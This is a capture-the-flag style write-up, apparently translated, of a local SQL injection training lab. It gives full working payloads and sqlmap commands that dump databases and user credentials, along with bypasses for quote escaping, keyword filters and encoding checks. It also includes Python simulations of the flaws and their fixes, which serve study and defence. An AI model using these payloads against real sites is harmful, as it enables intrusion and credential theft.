Someone recommended this web platform to me and it seems well suited to beginners. I searched online and couldn't find anyone who had written a writeup for it, so as a complete newcomer I'll tidy up my own solving process here.
SQL injection vulnerabilities
01 - Numeric injection
http://localhost:32774/sqli/01.php?id=1'
An error is returned:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1
So the query is presumably WHERE id=$id LIMIT 0,1
Verify it:
Count the columns:
Find the display positions:
Dump the databases: http://localhost:32774/sqli/01.php?id=1%20union%20select%201,2,group_concat(schema_name)%20from%20information_schema.schemata%20--+
Dump the tables: http://localhost:32774/sqli/01.php?id=1%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())%20--+
Dump the columns: http://localhost:32774/sqli/01.php?id=1%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema%20=database()%20and%20table_name=%27users%27)%20--+
Dump the data: http://localhost:32774/sqli/01.php?id=1%20union%20select%201,2,(select%20group_concat(concat(role,0x7e,username,0x3A,password,0x7e))%20from%20users)%20%20--+
02 - String injection
http://localhost:32774/sqli/02.php?id=1' or '1=2--'
Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1' or '1=2--'' LIMIT 0,1' at line 1
Looking at the source, there is a SET NAMES gbk
Guess: wide-byte injection
Try: http://localhost:32774/sqli/02.php?id=1%df' and 1=2 union select 1,2,3 --+
Dump the databases: http://localhost:32774/sqli/02.php?id=1%df' and 1=2 union select 1,2,group_concat(schema_name) from information_schema.schemata --+
Dump the tables: http://localhost:32774/sqli/02.php?id=1%df' and 1=2 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()) --+
Dump the data: http://localhost:32774/sqli/02.php?id=1%df' and 1=2 union select 1,2,(select group_concat(concat(role,0x7e,username,0x3A,password,0x7e)) from users) --+
Apart from the wide byte up front, which makes MySQL treat the byte pair as a single Chinese character and so gets past the check, everything else is the same as challenge 01.
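Why the %df' prefix from this challenge gets past the escaping, as an added Python simulation that is not part of the original writeup or the iwebsec source: addslashes() works on raw bytes, but with SET NAMES gbk the server decodes the escaped bytes as GBK, so 0xDF and the inserted 0x5C backslash merge into one two-byte character and the quote is left bare. The function names and the byte-level escape routine are my own assumptions about the challenge's PHP.

```python
# Added example: byte-level simulation of the wide-byte (GBK) escaping bypass.
# addslashes(), server_sees() and escape_after_decode() are my own names, not
# the challenge's PHP; they model addslashes() followed by SET NAMES gbk.

def addslashes(raw: bytes) -> bytes:
    """Byte-oriented escaping like PHP's addslashes(): it never looks at charsets."""
    out = bytearray()
    for b in raw:
        if b in b"'\"\\\x00":
            out.append(0x5C)  # prepend a backslash (0x5C)
        out.append(b)
    return bytes(out)


def server_sees(escaped: bytes, charset: str) -> str:
    """MySQL decodes the query bytes with the connection charset before parsing."""
    return escaped.decode(charset, errors="replace")


def quote_is_live(sql_text: str) -> bool:
    """True if a single quote is not preceded by a backslash, i.e. it closes the literal."""
    return any(ch == "'" and (i == 0 or sql_text[i - 1] != "\\")
               for i, ch in enumerate(sql_text))


def quote_survives(raw: bytes, charset: str) -> bool:
    """Does an unescaped quote reach the parser after addslashes() + decoding?"""
    return quote_is_live(server_sees(addslashes(raw), charset))


def escape_after_decode(raw: bytes, charset: str) -> str:
    """Charset-aware escaping (what mysqli_set_charset() + real_escape_string()
    gives): decode first, then escape characters, so no lead byte can swallow the
    backslash. Parameterised queries remove the problem entirely."""
    text = raw.decode(charset, errors="replace")
    return "".join("\\" + ch if ch in "'\"\\" else ch for ch in text)


if __name__ == "__main__":
    payload = b"1\xdf'"  # constructed: the %df' prefix used in this challenge
    print(addslashes(payload))                      # backslash inserted before the quote
    print(server_sees(addslashes(payload), "gbk"))  # 0xDF 0x5C became one character
    print(quote_survives(payload, "gbk"), quote_survives(payload, "utf-8"))
    print(quote_is_live(escape_after_decode(payload, "gbk")))
```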
03 - Boolean-based injection
http://localhost:32774/sqli/03.php?id=1 and 1=2 --+
Once it's confirmed to be boolean-based blind injection I couldn't be bothered to write a script, so straight to sqlmap:
Dump the database: sqlmap -u http://localhost:32774/sqli/03.php?id=1 --current-db
Dump the tables: sqlmap -u http://localhost:32774/sqli/03.php?id=1 -D iwebsec --tables
Dump the columns: sqlmap -u http://localhost:32774/sqli/03.php?id=1 -D iwebsec -T users --columns
Dump the data: sqlmap -u http://localhost:32774/sqli/03.php?id=1 -D iwebsec -T users -C role,username,password --dump
04 - Sleep-based injection
My own script is really ugly, so I'll spare myself the embarrassment here.
Time-based blind, dump the database: sqlmap -u http://localhost:32774/sqli/04.php?id=1 -p id --technique T --time-sec 3 --current-db
Dump the tables: sqlmap -u http://localhost:32774/sqli/04.php?id=1 -p id --technique T --time-sec 3 -D iwebsec --tables
Dump the columns: sqlmap -u http://localhost:32774/sqli/04.php?id=1 -p id --technique T --time-sec 3 -D iwebsec -T user --columns
Dump the data: sqlmap -u http://localhost:32774/sqli/04.php?id=1 -p id --technique T --time-sec 3 -D iwebsec -T user -C id,password,username --dump
05 - updatexml injection
The restrictions on this challenge weren't set up properly: even the payload from challenge 01 works.
Still, let's go through it the intended way, with and (updatexml(1,concat(0x7e,(select version()),0x7e),1))
First check: http://localhost:32774/sqli/05.php?id=1 and (updatexml(1,concat(0x7e,(select version()),0x7e),1))
Injection confirmed; proceed using the updatexml() function.
Dump the databases: http://localhost:32774/sqli/05.php?id=1 and (updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e),1))
Dump the tables: http://localhost:32774/sqli/05.php?id=1 and (updatexml(1,concat(0x7e,(select (select group_concat(table_name) from information_schema.tables where table_schema=database())),0x7e),1))
Dump the columns: http://localhost:32774/sqli/05.php?id=1 and (updatexml(1,concat(0x7e,(select (select group_concat(column_name) from information_schema.columns where table_schema =database() and table_name='users')),0x7e),1))
Dump the data: http://localhost:32774/sqli/05.php?id=1 and (updatexml(1,concat(0x7e,(select (select group_concat(concat(role,0x7e,username,0x3A,password,0x7e)) from users)),0x7e),1))
06 - Wide-byte injection
The title already gives this away as wide-byte injection, which overlaps with challenge 02, so let's take a different approach and run sqlmap through it.
What you need to know here is that running sqlmap -u http://localhost:32774/sqli/06.php?id=1 directly
finds no injection point; you need sqlmap -u http://localhost:32774/sqli/06.php?id=1%df%27
or the unmagicquotes tamper script, --tamper="unmagicquotes":
Dump the database: sqlmap -u "http://localhost:32774/sqli/06.php?id=1" --tamper="unmagicquotes" --current-db
Dump the tables: sqlmap -u "http://localhost:32774/sqli/06.php?id=1" --tamper="unmagicquotes" -D iwebsec --tables
Dump the columns: sqlmap -u "http://localhost:32774/sqli/06.php?id=1" --tamper="unmagicquotes" -D iwebsec -T users --columns
Dump the data: sqlmap -u "http://localhost:32774/sqli/06.php?id=1" --tamper="unmagicquotes" -D iwebsec -T users -C role,username,password --dump
07 - Space filter bypass
The title says spaces are filtered; I chose to use parentheses so that no spaces are needed between tokens (with %0a where a separator is unavoidable): http://localhost:32774/sqli/07.php?id=(0)or(1)=(1)
Find the display positions: http://localhost:32774/sqli/07.php?id=(0)%0aunion%0aselect(1),(2),(3)
Dump the databases: http://localhost:32774/sqli/07.php?id=(0)%0Aunion%0Aselect(1),(2),(select%0Agroup_concat(schema_name)%0Afrom%0Ainformation_schema.schemata)
Dump the tables: http://localhost:32774/sqli/07.php?id=(0)%0Aunion%0Aselect(1),(2),(select%0Agroup_concat(table_name)%0Afrom%0Ainformation_schema.tables%0Awhere%0Atable_schema=database())
Dump the columns: http://localhost:32774/sqli/07.php?id=(0)%0Aunion%0Aselect(1),(2),(select%0Agroup_concat(column_name)%0Afrom%0Ainformation_schema.columns%0awhere%0atable_schema=database()and(table_name='users'))
Dump the data: http://localhost:32774/sqli/07.php?id=(0)%0Aunion%0Aselect(1),(2),(select%0Agroup_concat(concat(role,0x7e,username,0x3A,password,0x7e))%0Afrom%0Ausers)
08 - Case filter bypass
Routine testing shows the check is on select; going by the title, changing the case of select is all that's needed.
Display positions:
Dump the databases: http://localhost:32774/sqli/08.php?id=1 union Select 1,2,group_concat(schema_name) from information_schema.schemata--+
Dump the tables: http://localhost:32774/sqli/08.php?id=1 union Select 1,2,(Select group_concat(table_name) from information_schema.tables where table_schema=database())--+
Dump the columns: http://localhost:32774/sqli/08.php?id=1 union Select 1,2,(Select group_concat(column_name) from information_schema.columns where table_schema =database() and table_name='users')--+
Dump the data: http://localhost:32774/sqli/08.php?id=1 union Select 1,2,(Select group_concat(concat(role,0x7e,username,0x3A,password,0x7e)) from users)--+
09 - Keyword doubling bypass
Confirm the injection exists.
The string select turns out to be filtered; from the title, doubling the keyword is what's needed, so try http://localhost:32774/sqli/09.php?id=1 union seselectlect 1,2,3--+
Why the bypass works:
The filter matches the select in the middle of "se" + "select" + "lect" and replaces it with an empty string; the parts on either side then join back up into select, so the single check is bypassed.
Dump the databases: http://localhost:32774/sqli/09.php?id=1 union seselectlect 1,2,group_concat(schema_name) from information_schema.schemata--+
Dump the tables: http://localhost:32774/sqli/09.php?id=1 union seselectlect 1,2,(seselectlect group_concat(table_name) from information_schema.tables where table_schema=database())--+
Dump the columns: http://localhost:32774/sqli/09.php?id=1 union seselectlect 1,2,(seselectlect group_concat(column_name) from information_schema.columns where table_schema =database() and table_name='users')--+
Dump the data: http://localhost:32774/sqli/09.php?id=1 union seselectlect 1,2,(seselectlect group_concat(concat(role,0x7e,username,0x3A,password,0x7e)) from users)--+
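The filter behaviour behind challenges 08 and 09, as an added Python simulation that is not the challenge's PHP (I am assuming its filter is a single case-sensitive str_replace of select): one pass removes the inner select from seselectlect and leaves a valid keyword, and a capitalised Select is never matched at all. Repeating the removal until the string stops changing closes the doubling hole, but the fix that holds for every variant is binding id as a query parameter, shown here with sqlite3 standing in for MySQL.

```python
# Added example: the 08/09 filter pitfalls and the fix. strip_once() models the
# assumed single str_replace('select', '', $id); all names are mine, not iwebsec's.
import re
import sqlite3

SELECT_RE = re.compile(r"\bselect\b", re.IGNORECASE)


def strip_once(param: str) -> str:
    """One case-sensitive removal pass: what a single str_replace() does."""
    return param.replace("select", "")


def strip_until_stable(param: str) -> str:
    """Repeat the removal until nothing changes, so re-joined halves are caught too."""
    while True:
        cleaned = param.replace("select", "")
        if cleaned == param:
            return cleaned
        param = cleaned


def keyword_reaches_sql(cleaned: str) -> bool:
    """Would a SELECT token (in any case) still reach the query after filtering?"""
    return SELECT_RE.search(cleaned) is not None


def safe_lookup(user_input: str) -> list:
    """Parameterised query: the input is bound as a value and never parsed as SQL,
    so no keyword blacklist is needed at all."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'alice')")  # constructed sample row
    rows = conn.execute(
        "SELECT id, username FROM users WHERE id = ? LIMIT 1", (user_input,)
    ).fetchall()
    conn.close()
    return rows


if __name__ == "__main__":
    doubled = "1 union seselectlect 1,2,3"  # the 09 payload shape
    cased = "1 union Select 1,2,3"          # the 08 payload shape
    print(strip_once(doubled), keyword_reaches_sql(strip_once(doubled)))  # keyword survives
    print(strip_once(cased), keyword_reaches_sql(strip_once(cased)))      # never matched
    print(strip_until_stable(doubled), keyword_reaches_sql(strip_until_stable(doubled)))
    print(safe_lookup(doubled), safe_lookup("1"))  # no row for the payload, one row for "1"
```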
10 - Double URL encoding bypass
From the title you can guess that the source runs urldecode() on $id once; testing also shows select is filtered, so it should be enough to take the payloads from challenge 08 and URL-encode them twice.
Script:
from urllib.parse import quote

a = ""  # the statement to encode goes here
print(quote(quote(a)))
That's what I assumed, anyway.
In the end it was never needed: the statements from challenge 08 work unchanged.
Out of respect for the challenge, let's still do it with double URL encoding.
Dump the databases
Original statement: 1 union Select 1,2,group_concat(schema_name) from information_schema.schemata#
Encoded: 1%2520union%2520Select%25201%252C2%252Cgroup_concat%2528schema_name%2529%2520from%2520information_schema.schemata%2523
Final: http://localhost:32774/sqli/10.php?id=1%2520union%2520Select%25201%252C2%252Cgroup_concat%2528schema_name%2529%2520from%2520information_schema.schemata%2523
Dump the tables
Original statement: 1 union Select 1,2,(Select group_concat(table_name) from information_schema.tables where table_schema=database())#
Encoded: 1%2520union%2520Select%25201%252C2%252C%2528Select%2520group_concat%2528table_name%2529%2520from%2520information_schema.tables%2520where%2520table_schema%253Ddatabase%2528%2529%2529%2523
Final: http://localhost:32774/sqli/10.php?id=1%2520union%2520Select%25201%252C2%252C%2528Select%2520group_concat%2528table_name%2529%2520from%2520information_schema.tables%2520where%2520table_schema%253Ddatabase%2528%2529%2529%2523
Dump the columns
Original statement: 1 union Select 1,2,(Select group_concat(column_name) from information_schema.columns where table_schema =database() and table_name='users')#
Encoded: 1%2520union%2520Select%25201%252C2%252C%2528Select%2520group_concat%2528column_name%2529%2520from%2520information_schema.columns%2520where%2520table_schema%2520%253Ddatabase%2528%2529%2520and%2520table_name%253D%2527users%2527%2529%2523
Final: http://localhost:32774/sqli/10.php?id=1%2520union%2520Select%25201%252C2%252C%2528Select%2520group_concat%2528column_name%2529%2520from%2520information_schema.columns%2520where%2520table_schema%2520%253Ddatabase%2528%2529%2520and%2520table_name%253D%2527users%2527%2529%2523
Dump the data
Original statement: 1 union Select 1,2,(Select group_concat(concat(role,0x7e,username,0x3A,password,0x7e)) from users) #
Encoded: 1%2520union%2520Select%25201%252C2%252C%2528Select%2520group_concat%2528concat%2528role%252C0x7e%252Cusername%252C0x3A%252Cpassword%252C0x7e%2529%2529%2520from%2520users%2529%2520%2523
Final: http://localhost:32774/sqli/10.php?id=1%2520union%2520Select%25201%252C2%252C%2528Select%2520group_concat%2528concat%2528role%252C0x7e%252Cusername%252C0x3A%252Cpassword%252C0x7e%2529%2529%2520from%2520users%2529%2520%2523
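The ordering problem that double encoding exploits in this challenge, as an added Python simulation that is not the challenge's PHP: PHP has already decoded $_GET once when the check runs, and the application's own urldecode() happens afterwards, so the check and the database see different strings. The check used here (refuse a union ... select sequence in any case) is my assumption, chosen to show why the %2520 separators matter; decoding to the canonical form before validating is the prerequisite, and binding the value as a parameter remains the real fix.

```python
# Added example: validate-then-decode vs decode-then-validate for challenge 10.
# passes_waf() is an assumed check, not the challenge's real filter.
import re
from urllib.parse import quote, unquote

# Constructed from the "original statement" of the databases step above,
# encoded twice the same way the writeup does.
ORIGINAL = "1 union Select 1,2,group_concat(schema_name) from information_schema.schemata#"
DOUBLE_ENCODED = quote(quote(ORIGINAL))


def passes_waf(value: str) -> bool:
    """Assumed blacklist: refuse a 'union <whitespace> select' sequence in any case."""
    return re.search(r"union\s+select", value, re.IGNORECASE) is None


def decode_fully(value: str) -> str:
    """Canonicalise: keep percent-decoding until the string stops changing."""
    while True:
        decoded = unquote(value)
        if decoded == value:
            return decoded
        value = decoded


def vulnerable_handler(raw_value: str):
    """Models 10.php: PHP decodes $_GET once, the check runs, then urldecode() runs again.
    Returns the text that reaches the SQL string, or None if the check refused it."""
    once = unquote(raw_value)     # what $_GET['id'] holds
    if not passes_waf(once):      # the check sees %20 where the database will see a space
        return None
    return unquote(once)          # the application's extra urldecode()


def fixed_handler(raw_value: str):
    """Decode to the canonical form first, then validate that same string."""
    canonical = decode_fully(unquote(raw_value))
    if not passes_waf(canonical):
        return None
    return canonical


if __name__ == "__main__":
    print(DOUBLE_ENCODED)                      # 1%2520union%2520Select%25201%252C2...
    print(vulnerable_handler(DOUBLE_ENCODED))  # the full statement reaches the query
    print(fixed_handler(DOUBLE_ENCODED))       # None: refused once canonicalised
```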
11 - Hex encoding bypass
Start with the normal steps.
Find the display positions: http://localhost:32774/sqli/11.php?id=1%20union%20select%201,2,3--+
Dump the databases: http://localhost:32774/sqli/11.php?id=1 union select 1,2,group_concat(schema_name) from information_schema.schemata--+
Dump the tables: http://localhost:32774/sqli/11.php?id=1 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())--+
The problem appears when dumping the columns: quotes are filtered.
So use the hex encoding of user (0x75736572) to get around the restriction.
Dump the columns: http://localhost:32774/sqli/11.php?id=1 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema =database() and table_name=0x75736572)--+
Dump the data: http://localhost:32774/sqli/11.php?id=1 union select 1,2,(select group_concat(concat(id,0x7e,username,0x3A,password,0x7e)) from user) --+
12 - Equivalent-function replacement bypass
A quick test shows the equals sign is filtered, so the database dump still works as normal: http://localhost:32774/sqli/12.php?id=1 union select 1,2,group_concat(schema_name) from information_schema.schemata--+
Following the title, replace the equals sign with an equivalent function; I chose like, because without a percent sign a like clause behaves the same as =.
Dump the tables: http://localhost:32774/sqli/12.php?id=1 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema like database())--+
Dump the columns: http://localhost:32774/sqli/12.php?id=1 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema like database() and table_name like 'users')--+
Dump the data: http://localhost:32774/sqli/12.php?id=1 union select 1,2,(select group_concat(concat(role,0x7e,username,0x3A,password,0x7e)) from users) --+
13 - Second-order injection
This one is actually quite easy; a quick outline of the flow:
1. Register a user, entering username, password and email
2. Recover the password: entering an existing email returns the username and password
So here's the question: this is an injection challenge, and from an injection standpoint the username should be placed into the query and then executed through password recovery
But since I'm lazy, I went straight for the universal password trick
This makes the query look up admin instead of admin'#